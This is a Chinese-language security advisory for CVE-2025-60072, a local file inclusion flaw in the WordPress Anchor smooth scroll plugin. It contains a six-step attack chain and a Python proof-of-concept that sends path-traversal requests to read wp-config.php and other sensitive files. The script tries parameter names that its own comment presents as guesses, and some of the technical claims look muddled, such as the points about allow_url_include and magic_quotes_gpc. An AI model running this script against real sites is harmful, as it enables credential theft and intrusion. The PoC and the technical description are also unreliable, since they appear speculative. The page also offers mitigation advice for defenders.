CVE-2025-60072 WordPress Anchor smooth scroll插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60072

漏洞类型

本地文件包含(LFI)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Anchor smooth scroll plugin <= 1.0.2

漏洞概述

CVE-2025-60072是WordPress插件Anchor smooth scroll中的一个高危本地文件包含漏洞。该漏洞由PatchStack安全团队的[email protected]发现并报告。漏洞根源在于PHP程序对文件名包含/引用语句的控制不当，攻击者可以通过构造恶意请求，利用该插件的锚点平滑滚动功能，读取服务器上的敏感本地文件。受影响版本从插件初始版本到1.0.2版本。由于该漏洞允许未经认证的远程攻击者通过HTTP请求触发，因此可能造成严重的机密信息泄露风险，包括读取配置文件、凭据文件、系统敏感文件等。此漏洞的CVSS评分达到8.1分，属于高危级别，需要立即采取修复措施。

技术细节

该漏洞属于PHP本地文件包含（Local File Inclusion, LFI）类型，源于Anchor smooth scroll插件在处理锚点跳转时对用户输入的文件路径验证不足。攻击者可以通过URL参数或POST请求，注入恶意文件路径（如../../../../etc/passwd或PHP伪协议），利用include/require等PHP文件包含函数读取目标文件内容。由于WordPress插件通常以固定格式加载特定文件，攻击者可利用路径遍历技术（../）穿越目录限制，访问Web根目录之外的系统文件。攻击成功的关键在于服务器PHP配置中allow_url_include未启用（本地文件包含），以及magic_quotes_gpc关闭（允许路径字符串）。典型利用场景包括：读取wp-config.php获取数据库凭证、读取.htaccess和.htpasswd文件、读取其他插件配置文件等敏感信息。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描使用WordPress且安装Anchor smooth scroll插件<=1.0.2版本的网站

STEP 2

步骤2

构造Payload：利用路径遍历技术（../../../../）和PHP伪协议构造恶意文件包含请求

STEP 3

步骤3

发送恶意请求：通过HTTP GET/POST请求携带构造的路径参数，触发插件的文件包含逻辑

STEP 4

步骤4

文件读取成功：服务器PHP解释器执行include语句，将目标文件内容包含到响应中返回给攻击者

STEP 5

步骤5

敏感信息提取：攻击者获取wp-config.php等配置文件内容，提取数据库凭据、API密钥等敏感信息

STEP 6

步骤6

权限提升/持久化：利用窃取的凭据进一步入侵数据库或横向移动到其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60072 PoC - Local File Inclusion in Anchor Smooth Scroll Plugin
# Target: WordPress site with Anchor smooth scroll plugin <= 1.0.2

import requests
import sys
from urllib.parse import quote

def exploit_lfi(target_url, filename='../../../../wp-config.php'):
    """
    Exploit Local File Inclusion vulnerability
    Args:
        target_url: Base URL of the vulnerable WordPress site
        filename: Path to file to read (path traversal)
    """
    # Encode the path traversal payload
    encoded_filename = quote(filename)
    
    # Try common parameter names used by anchor smooth scroll
    params_to_try = [
        f'?anchor={encoded_filename}',
        f'?page_id={encoded_filename}',
        f'?scroll={encoded_filename}',
    ]
    
    for param in params_to_try:
        try:
            url = target_url.rstrip('/') + param
            response = requests.get(url, timeout=10)
            
            # Check if file content was returned
            if 'DB_NAME' in response.text or '<?php' in response.text:
                print(f'[+] Success! File content found at: {url}')
                print(f'[+] Content preview:\n{response.text[:500]}...')
                return True
            elif response.status_code == 200 and len(response.text) > 0:
                print(f'[*] Possible leak at: {url}')
        except requests.RequestException as e:
            print(f'[-] Error: {e}')
    
    return False

# Example usage
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve_2025_60072_poc.py <target_url>')
        print('Example: python cve_2025_60072_poc.py http://vulnerable-site.com')
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_lfi(target)

影响范围

Anchor smooth scroll <= 1.0.2 (所有版本)

WordPress (受影响插件运行环境)

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1) 使用WAF（如Cloudflare、AWS WAF等）配置规则过滤包含路径遍历字符的请求；2) 通过.htaccess或Nginx配置限制对插件目录的直接访问；3) 临时禁用Anchor smooth scroll插件直至修复版本可用；4) 确保wp-config.php等敏感文件位于Web根目录之外且权限设置为640；5) 加强服务器文件系统权限管理，遵循最小权限原则。